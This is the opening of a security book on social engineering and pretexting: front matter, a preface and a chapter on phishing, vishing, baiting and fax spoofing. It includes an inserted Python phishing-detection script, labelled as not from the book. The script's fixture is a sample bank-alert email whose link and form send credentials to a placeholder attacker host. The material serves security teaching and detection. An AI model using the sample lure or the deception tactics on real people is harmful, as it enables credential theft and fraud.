The Social Engineer's Playbook
A Practical Guide to Pretexting
Jeremiah Talamantes
Copyright © 2014 by Jeremiah Talamantes
All rights reserved. This book or any portion thereof may not be reproduced or used in any manner whatsoever without the express written permission of the publisher except for the use of brief quotations in a book review or scholarly journal.
ISBN-13: 978-0692306611
ISBN-10: 0692306617
This publication is designed to provide accurate and authoritative information in regard to the subject matter covered. The author has made every effort in the preparation of this book to ensure the accuracy of the information. However, information in this book is sold without warranty either expressed or implied. The author or publisher will not be liable for any damages caused, or alleged to be caused, either directly or indirectly by this book.
Library of Congress Control Number: 2014919212
Hexcode Publishing, Woodbury, MN
Ordering Information:
Special discounts are available on quantity purchases by corporations, associations, educators, and others. For details, contact the publisher at the above listed address.
U.S. trade bookstores and wholesalers: please contact Hexcode Publishing at: email@hexcodepublishing.com
Dedication
This book is dedicated to my beautiful family. To my precious little girl, Emmy, I hold you in the warmest place in my heart. To my new-born son, Maxwell, I love you so very much little buddy. To my beautiful wife, Katie, I am simply not worthy of you. I love you.
Contents
ACKNOWLEDGEMENTS
PREFACE
TARGET AUDIENCE
WHAT THIS BOOK COVERS
ABOUT THE AUTHOR
LIMITATION OF LIABILITY / DISCLAIMER OF WARRANTY
INTRODUCTION TO SOCIAL ENGINEERING
OVERVIEW
HISTORY
TYPES OF SOCIAL ENGINEERING
Email (Phishing/Spear phishing)
Telephone (Vishing)
Baiting
Fax
Pretexting
INFLUENCING TECHNIQUES
RECIPROCITY
AUTHORITY
SCARCITY
LIKABILITY
CONCESSION
OBLIGATION
ELICITATION
FLATTERY
FALSE STATEMENTS
ARTIFICIAL IGNORANCE
THE SOUNDING BOARD
BRACKETING
CONFIDENTIAL BAITING
PRETEXTING
RESEARCH & PLANNING
LEGAL CONSIDERATIONS
BODY LANGUAGE
Positioning
Emulating
Anchoring
INFORMATION GATHERING
OVERVIEW
INFORMATION ORGANIZATION
Overview
Dradis Framework
KeepNote
SOURCES OF INFORMATION
Online
Surveillance
TOOLS
COMPUTER BASED TOOLS
Kali Linux
Social Engineering Toolkit (SET)
Metasploit Framework
Maltego
PHYSICAL TOOLS
Cameras
GPS
Clothing
Telephone
Lock Picking
Miscellaneous Tools
THE PLAYBOOK
LEGAL & WARRANTY DISCLAIMER
SPEAR PHISHING
Security Bulletin!
Bank Security Email Alert
IRS Audit Notice
Get Your Updates Here
Company Re-Org
TELEPHONE
The Forgetful User
Sleight of Hand
Financial Foray
Attack of the Phones
Car Tow
BAITING
Oldie but A Goody
Blazing Fast Interwebs
Save Big Money!
Recalling All Cars!
Bank Security Software
RESOURCES
Acknowledgements
I want to thank my loving parents, Ray and Alma, and my brother Johnnie and his wife, Jenell. I’d also like to thank my father-in-law, Steveo, and my mother-in-law, Beth, for all of their support. Lastly, I’d like to thank RedTeam Security for affording me the opportunity to pursue this endeavor.
RedTeam Security
http://www.redteamsecure.com
http://facebook.com/redteamsecure/
http://twitter.com/redteamsecure/
Preface
This book is about social engineering with a focus on pretexting. Social engineering is not a new concept. There are countless books on various aspects of the subject. My goal in writing this book was to provide an approach toward pretexting that wasn’t available when I began my information security career. At the time, there was little published on the topic, let alone material that honed in on pretexting. Therefore, my motivation for writing is to provide additional tactics and insight into pretexting where there is clearly a gap in available information.
My experience with social engineering started many years ago while working as a security consultant. I was fortunate enough to be exposed to the concept before actually performing the work. This helped tremendously to calm my nerves, but I always felt something was missing. While my consulting work had successful results, I felt as if I was repeating the same tactics too often. It seemed as though there wasn’t enough creativity or deeper insight into the exploitation of human behavior. My hope is that this book serves to address some of these concerns and sparks social engineers to explore human behaviors through pretexting and exploitation.
Target Audience
This book was written for any person interested in learning more about social engineering with a focus on pretexting. It is assumed, therefore, the reader has a basic working knowledge about social engineering and information technology.
This book is recommended especially for security consultants, IT security analysts, blue teams, red teams, security managers and CISOs. However, if you have an interest in securing your environment or testing other environments, this book is for you.
What This Book Covers
Introduction – introduces the concept of social engineering, its history and different types of social engineering.
Influencing Techniques – discusses several approaches toward influencing and manipulating others. Types of tactics include: reciprocity, authority, scarcity, likability, concession and obligation.
Elicitation – elicitation is a method of gaining intelligence from individuals without them being aware of it. This chapter discusses tactics, such as: flattery, being a sounding board, bracketing, confidential baiting and others.
Pretexting – covers the psychological manipulation of people into performing actions or divulging confidential information by creating fabricated scenarios.
Information Gathering – discusses the many sources and techniques used to gather valuable intelligence for social engineering purposes.
Tools – provides an overview and guide to using social engineering tools.
The Playbook – includes a varied collection of creative, innovative pretext scenarios to use or augment.
About the Author
Jeremiah Talamantes is the founder of RedTeam Security and the founder and principal security researcher for The Plug-bot Project. Jeremiah has nearly 20 years in the IT security industry. He holds a master’s degree in information security & assurance and an executive business education from the University of Notre Dame. He is a researcher, author and adjunct faculty member at Norwich University, College of Graduate Studies in information security & assurance. Jeremiah has served as a CISO and expert consultant to several Fortune 500 companies. He is a CISSP, CCISO, CEH, CHFI and CCENT.
Additional Resources:
Research Projects – http://www.redteamsecure.com/labs/all_projects
LinkedIn – http://www.linkedin.com/in/jtalamantes/
Facebook – http://www.facebook.com/redteamsecure
Twitter – http://twitter.com/redteamsecure
Limitation of Liability / Disclaimer of Warranty
THE PUBLISHER AND THE AUTHOR MAKE NO REPRESENTATIONS OR WARRANTIES WITH RESPECT TO THE ACCURACY OR COMPLETENESS OF THE CONTENTS OF THIS WORK AND SPECIFICALLY DISCLAIM ALL WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE. NO WARRANTY MAY BE CREATED OR EXTENDED BY SALES OR PROMOTIONAL MATERIALS. THE ADVICE AND STRATEGIES CONTAINED HEREIN MAY NOT BE SUITABLE FOR EVERY SITUATION. THIS WORK IS SOLD WITH THE UNDERSTANDING THAT THE PUBLISHER IS NOT ENGAGED IN RENDERING LEGAL, ACCOUNTING OR OTHER PROFESSIONAL SERVICES. NEITHER THE PUBLISHER NOR THE AUTHOR SHALL BE LIABLE FOR DAMAGES ARISING HEREFROM. THE FACT THAT AN ORGANIZATION OR WEB SITE IS REFERRED TO IN THIS WORK AS A CITATION, SOURCE OR OTHERWISE DOES NOT MEAN THAT THE AUTHOR OR PUBLISHER ENDORSES THE INFORMATION THE ORGANIZER OF THE WEB SITE MAY PROVIDE OR RECOMMENDATIONS IT MAY MAKE.
Chapter 1:
Introduction to Social Engineering
Even within the IT community, many often misinterpret social engineering. This chapter aims to provide a comprehensive introduction to social engineering, its history and some of the concepts that surround it. Many of the tactics and theories discussed in this book may be considered unethical in certain situations. However, the tactics examined here should be used for ethical purposes only.
Social engineering techniques are often thought of as “dark arts” that only the most elite hackers use, or that one sees played out in Hollywood movies. I aim to dispel some of these beliefs by starting out with a comprehensive overview of social engineering.
This chapter will cover the following topics:
Overview of social engineering
Brief history of social engineering
Types of social engineering
Overview
According to Wikipedia, social engineering is defined as “the act of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer systems access; in most cases the attacker never comes face-to-face with the victim.”
While Wikipedia offers a basic definition of social engineering, I would like to expand on two points. First, the definition of social engineering should be adapted slightly to state that it involves the act of manipulating a person into performing actions that are not in the target’s best interest. That is to say, the goal of this book is to provide social engineering techniques to be used in attack scenario simulations where the target (victim) is not in a position of benefitting from the situation. Secondly, the Wikipedia definition also indicates that the attacker almost never comes into physical contact with the victim in real life. This is partly true. A social engineering attack is ordinarily accomplished without face-to-face contact, but the pendulum is beginning to swing in the other direction. Social engineering attacks with some level of physical contact have been rising steadily over the years.
So far we’ve learned that social engineering attacks are directed at people in an effort to get them to do something beneficial to the attacker, such as getting victims to divulge passwords and credit card information. But the question is, how is this primarily accomplished? The definitive answer to this question is through the manipulation of the human element – trust.
It can easily be said that social engineering is the exploitation of human behavior and trust. After all, convincing or enticing people to do things such as divulging their passwords and other sensitive information is not as straightforward as one might think. Persuading people to give up this kind of information often involves planning, deception and a deep understanding of the factors behind human psychological behavior. It’s no wonder that most victims feel attacked on a very personal level.
Social engineers prey on the intrinsic human traits of wanting to be helpful and wanting to be liked. They understand these traits at a deeper level and craft their attacks accordingly. It is a plan of attack that involves playing on human emotion, deceptive tricks and lies, and the service industry is often smack dab in the crosshairs. After all, what better industries to exploit than those that are supposed to be helpful and courteous? This is especially true in the hospitality industry. But does it mean that service people should be defensive and rude? Absolutely not. It does, however, call for a change in behavior and the wherewithal to know when you’re under attack and what to do about it.
Before digging deeper into the specifics of social engineering tactics, let’s take a look at the history of social engineering.
History
Some believe social engineering began as a result of recent technological advances, such as email spear phishing. The practice, however, has been around for ages in a number of different forms. It has merely evolved over the years.
Photo of Charles Ponzi – famous con artist
George Parker is responsible for the popular expression, “And if you believe that, I have a bridge to sell you.” Many have used the expression but might not understand exactly where it came from. In the early 1900s, George Parker used social engineering tactics to con tourists into buying famous landmarks, such as the Brooklyn Bridge. And who could forget Charles Ponzi? In 1920 he was exposed in a massive “Ponzi scheme” to swindle money out of investors with the promise of unbelievable returns.
Kevin Mitnick and Frank Abagnale are two more examples of extraordinary social engineers, whose exploits ranged from the theft of proprietary software to masquerading as a Pan Am airline pilot.
One such historic example of social engineering is Ulysses, the leader of the Greek army, who built the infamous Trojan horse that ultimately led to the fall of Troy. During a siege in this historic battle, Ulysses managed to trick the Trojan army into believing his men had given up by leaving a large wooden horse as a sign of retreat just outside of the city’s gates. Well, I think we all know how the story played out. How does this story apply today? The Trojan horse strategy might as well be a page torn right out of today’s social engineer’s playbook. As the old adage goes, “History, with all her volumes vast, hath but one page.”
Types of Social Engineering
Unbeknownst to many, there are several types of social engineering attacks. It seems only the most elaborate ones are glamorized in the movies or manage to get press coverage. According to the Verizon Data Breach Report 2012, 37% of all records breached were the result of a social engineering attack. Those attacks weren’t the result of some elaborate scheme to take over a nuclear power plant or launch missiles into space. Instead, they involved a classic social engineering tactic called “pretexting.” Pretexting is a common tactic where a social engineer masquerades as a person of authority. This usually plays itself out as a social engineer pretending to be a network support person who urgently needs access to the company’s server room in order to “fix” something. Or he/she is pretending to be a friend or colleague with an important email attachment for you to see. Using these delivery mechanisms, a social engineer can be very creative with their pretext.
Email (Phishing/Spear phishing)
Phishing is a form of social engineering that is designed to acquire information about someone (username, password, bank information, etc.) while purporting to be someone of authority, such as Facebook or a bank. Phishing emails are designed to look and feel like they’re coming from a trusted authority, but their intent is to spread malware or steal data through malicious hyperlinks or HTML forms. Phishing attacks cast a wide net attempting to reel in as many victims as possible, while spear phishing attacks are targeted attacks pointed directly at a company, an industry or even specific people.
An example of a spear phishing email
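The two delivery mechanisms named above, a hyperlink whose visible text names one site while its href points somewhere else, and an HTML form that posts credentials to a host outside the sender's domain, are mechanical enough to check for automatically. The following is an added example (not code from the book or its author) of a small defender-side triage script that flags both in an HTML message body. The sample message, the sender domain `examplebank.com` and the `.test` host are all constructed for the example.

```python
"""Flag link-text mismatches and external credential forms in an HTML email.

Added example, not from the book. The sample message below is constructed;
the hosts in it are placeholders, not real phishing infrastructure.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkAndFormParser(HTMLParser):
    """Collect (href, visible text) for every <a> and the action of every <form>."""

    def __init__(self):
        super().__init__()
        self.links = []    # list of (href, visible text)
        self.forms = []    # list of form action URLs
        self._href = None  # href of the anchor currently being read, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._href = a["href"]
            self._text = []
        elif tag == "form" and a.get("action"):
            self.forms.append(a["action"])

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_host(url_or_text):
    """Lowercase hostname of a URL, or of a bare 'www.host.tld/path' string
    as it would appear in link text (a scheme is prepended if missing)."""
    s = url_or_text.strip()
    if "://" not in s:
        s = "http://" + s
    return (urlparse(s).hostname or "").lower()


def looks_like_url(text):
    """Heuristic: visible link text that a reader would read as an address."""
    return "." in text and " " not in text


def same_org(host, domain):
    """True if host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def phishing_indicators(html_body, sender_domain):
    """Return a list of (indicator, detail) tuples found in the message body."""
    p = _LinkAndFormParser()
    p.feed(html_body)
    sender_domain = sender_domain.lower()
    findings = []
    for href, text in p.links:
        href_host = registrable_host(href)
        # Visible text names one site, the href goes to another.
        if looks_like_url(text):
            text_host = registrable_host(text)
            if text_host and href_host and not (
                same_org(href_host, text_host) or same_org(text_host, href_host)
            ):
                findings.append(("link_text_mismatch",
                                 f"text shows {text_host}, href goes to {href_host}"))
        # Any link leaving the claimed sender's domain is worth a look.
        if href_host and not same_org(href_host, sender_domain):
            findings.append(("external_link", href_host))
    # A form in an email that posts to a foreign host is a credential trap.
    for action in p.forms:
        host = registrable_host(action)
        if host and not same_org(host, sender_domain):
            findings.append(("external_form_post", host))
    return findings


# Constructed sample: a "bank alert" whose link text and form target disagree
# with the domain the mail claims to come from.
SAMPLE_EMAIL = """
<html><body>
<p>Dear customer, unusual activity was detected on your account.</p>
<p>Please visit <a href="http://secure-login.example-attacker.test/verify">
   www.examplebank.com/security</a> to confirm your identity.</p>
<form action="http://secure-login.example-attacker.test/collect" method="post">
  <input name="user"><input name="pass" type="password"><input type="submit">
</form>
<p>Questions? Visit <a href="https://www.examplebank.com/help">our help center</a>.</p>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in phishing_indicators(SAMPLE_EMAIL, "examplebank.com"):
        print(f"{kind}: {detail}")
```

Run against the sample with the claimed sender domain `examplebank.com`, the script reports the text/href mismatch on the first link, that the link is external, and that the form posts to an external host; the genuine help-center link produces nothing. The `same_org` check is a plain suffix match, so a production version would want a public-suffix list rather than treating every `.tld` as its own organisation.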
Telephone (Vishing)
Telephone or voice phishing, also referred to as “vishing,” is a social engineering attack conducted over the telephone. This form is used by attackers to steal banking information by purporting to be a representative from the victim’s bank’s fraud department and asking the victim to validate his or her account by giving credit card information over the phone. In an attack against a business, an attacker often pretends to be help desk support, an executive, an end user or another position of authority.
This form of social engineering is used quite heavily. According to statistics, those outside of the United States perform this type of social engineering often. This is mostly due to the remote aspect and the perceived safety of not being physically present.
Baiting
Scattering USB drives around a company’s front door is a popular form of “baiting” a victim. USB drives labeled with interesting titles (“swimsuit pics” or “payroll”) trigger human curiosity. Meanwhile, malicious programs on the USB drive are designed to silently launch and attack once it is plugged into a computer. A security consultant named Steve Stasiukonis originally made this kind of social engineering popular many years ago, and its popularity continues today.
Fax
Fax? Yes, fax. It’s true people still fax documents. In fact, some organizations make heavy use of faxed documents. Many financial organizations exchange requests and authorizations for things such as credit checks and respond back via fax with personally identifiable information. These companies are among the many that face social engineering threats of this type. Because of the half-duplex, analog nature of facsimile, it is rather trivial to spoof fax headers and “become” an organization of authority. All in all, the fax machine lives on and is expected to remain an attack surface going forward.